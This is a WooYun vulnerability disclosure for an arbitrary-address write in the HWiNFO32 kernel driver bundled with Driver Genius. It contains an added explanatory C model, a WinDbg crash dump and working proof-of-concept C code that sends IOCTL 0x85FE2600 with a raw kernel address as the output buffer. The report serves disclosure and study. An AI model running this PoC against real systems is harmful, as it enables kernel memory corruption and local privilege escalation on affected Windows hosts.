Vulnerability Summary

Defect ID: wooyun-2014-077279

Title: HWiNFO32 driver arbitrary-address write of fixed data

Vendor: 驱动精灵 (Driver Genius)

Author: ywledoc

Submitted: 2014-09-29 17:45

Fix time: 2014-12-28 17:46

Disclosed: 2014-12-28 17:46

Vulnerability type: Privilege escalation

Severity: High

Self-assessed Rank: 18

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2014-09-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-28: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The HWiNFO32 driver does not filter its input strictly, resulting in an arbitrary-address write of fixed data. 驱动精灵 (Driver Genius) bundles HWiNFO32; in that product the driver is named Mydriver32.sys.

Detailed description:

In the DeviceIoControl dispatch routine, when IoControlCode = 0x85FE2600, the driver does not strictly validate the user-supplied lpOutBuffer parameter and calls nt!IopfCompleteRequest directly. After a chain of processing, the fault is ultimately triggered inside nt!IopCompleteRequest, where an arbitrary address can be written.
Because the write is finally performed in nt!IopCompleteRequest, the outcome also depends on the operating system: in testing, Windows XP SP3 can be exploited normally, while Windows 7 is not affected.
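As an added illustration (not the driver's or the author's code), the model below decodes the IOCTL and shows why the completion path is the sink: the low two bits of 0x85FE2600 are 0, i.e. METHOD_BUFFERED, for which the I/O manager copies Irp->IoStatus.Information bytes from the system buffer to the caller's output pointer on completion, having probed that pointer only for the OutputBufferLength the caller supplied (0 in the test code). The reply size and buffers are constructed, and it is an assumption that the driver sets Information from its own reply size without checking OutputBufferLength; the hardened dispatch shows the check that closes that gap.

```c
#include <stdint.h>
#include <string.h>

/* CTL_CODE layout (WDK): DeviceType<<16 | Access<<14 | Function<<2 | Method. */
#define METHOD_BUFFERED 0u
typedef struct { uint32_t device_type, access, function, method; } ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 3u;
    f.function    = (code >> 2) & 0xFFFu;
    f.method      = code & 3u;
    return f;
}

/* Vulnerable dispatch (assumed behaviour): reports the full reply size as
 * Irp->IoStatus.Information without comparing it to OutputBufferLength. */
size_t dispatch_vulnerable(size_t output_len, size_t reply_len)
{
    (void)output_len; return reply_len;
}

/* Hardened dispatch: fail the request (STATUS_BUFFER_TOO_SMALL) when the
 * reply does not fit, so Information never exceeds the probed length. */
int dispatch_hardened(size_t output_len, size_t reply_len, size_t *information)
{
    if (reply_len > output_len) { *information = 0; return -1; }
    *information = reply_len; return 0;
}

/* Model of the I/O manager's METHOD_BUFFERED completion copy (the rep movs in
 * the trap frame): Information bytes go from the system buffer to the caller's
 * pointer, probed only for output_len bytes. Returns bytes written past that. */
size_t bytes_written_past_probe(size_t output_len, int hardened)
{
    uint8_t system_buffer[0x110];  /* constructed reply size */
    uint8_t user_buffer[0x110];    /* stands in for the caller's pointer */
    size_t information = 0;
    memset(system_buffer, 0x41, sizeof system_buffer);
    if (hardened) {
        if (dispatch_hardened(output_len, sizeof system_buffer, &information) != 0)
            return 0;              /* request failed; nothing is copied back */
    } else {
        information = dispatch_vulnerable(output_len, sizeof system_buffer);
    }
    memcpy(user_buffer, system_buffer, information);
    return information > output_len ? information - output_len : 0;
}
```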

Proof of vulnerability:

WinDbg crash information.

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffff0000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
WRITE_ADDRESS: ffff0000
FAULTING_IP:
nt!IopCompleteRequest+92
804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: CODE_CORRUPTION
BUGCHECK_STR: 0x50
PROCESS_NAME: TestMyDriver32_
IRP_ADDRESS: 82177f68
DEVICE_OBJECT: 81d5f518
DRIVER_OBJECT: 81d26288
IMAGE_NAME: DgSafe.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 540684f3
MODULE_NAME: DgSafe
FAULTING_MODULE: b1250000 mydrivers32
TRAP_FRAME: b137f91c -- (.trap 0xffffffffb137f91c)
ErrCode = 00000002
eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000
eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
nt!IopCompleteRequest+0x92:
804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER: from 80533797 to 804e450a
STACK_TEXT:
b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstruction
b137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19
b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574
b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5
b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92
b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3
b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5
b137faac 804e63cc 82177fa8 82177f68 00000000 hal!KeReleaseInStackQueuedSpinLock+0x11
b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4b
b137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27
b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31
b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70
b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611
b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall
0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet
0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd
0013ff68 00401083 00000000 0040302c 78542201 TestMyDriver32_b!TestMyDriver32+0x58 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 29]
0013ff7c 0040120f 00000001 00033d48 000328b8 TestMyDriver32_b!wmain+0x13 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 37]
0013ffc0 7c816037 0558ee60 7c92d96e 7ffdf000 TestMyDriver32_b!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 579]
0013fff0 00000000 00401357 00000000 78746341 kernel32!BaseProcessStart+0x23
STACK_COMMAND: kb
CHKIMG_EXTENSION: !chkimg -lo 50 -d !nt
804df7da-804df7df 6 bytes - nt!KiSystemServiceAccessTeb+2c
[ 8b fc f6 45 72 02:e9 ce 15 b5 31 90 ]
80586896-80586899 4 bytes - nt!NtTerminateProcess+4b
[ ce f4 fd ff:ad 49 a9 31 ]
806319c6-806319c9 4 bytes - nt!NtTerminateJobObject+2d (+0xab130)
[ 9e 43 f3 ff:cd 98 9e 31 ]
14 errors : !nt (804df7da-806319c9)
FOLLOWUP_NAME: MachineOwner
MEMORY_CORRUPTOR: PATCH_DgSafe
FAILURE_BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafe
BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafe
Followup: MachineOwner
---------


Exploit test code:

    #include <windows.h>
    #include <stdio.h>
    #include <tchar.h>

    VOID TestMyDriver32()
    {
        HANDLE hCreateFile = INVALID_HANDLE_VALUE;
        DWORD dwInBuffer = 0x6c77792a;
        DWORD dwOutBuffer = 0xf8be8020; // kernel-writable address; change as needed
        hCreateFile = CreateFileA("\\\\.\\HWiNFO32",
            0,                     // no access to the drive
            FILE_SHARE_READ |      // share mode
            FILE_SHARE_WRITE,
            NULL,                  // default security attributes
            OPEN_EXISTING,         // disposition
            0,                     // file attributes
            NULL);
        if (hCreateFile == INVALID_HANDLE_VALUE)
        {
            printf("Error Open Device!\n");
            return;
        }
        // The output buffer argument is the raw target address, passed with length 0
        DeviceIoControl(hCreateFile, 0x85FE2600, (LPVOID)&dwInBuffer, 4, (LPVOID)dwOutBuffer, 0, &dwInBuffer, NULL);
        CloseHandle(hCreateFile);
        return;
    }

    int _tmain(int argc, _TCHAR* argv[])
    {
        char cSSS[10];
        TestMyDriver32();
        scanf("%9s", cSSS); // wait for input so the console stays open
        return 0;
    }


Fix recommendation:

The developers understand it better.

Copyright notice: please credit the source when reproducing: ywledoc@WooYun


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively declined the report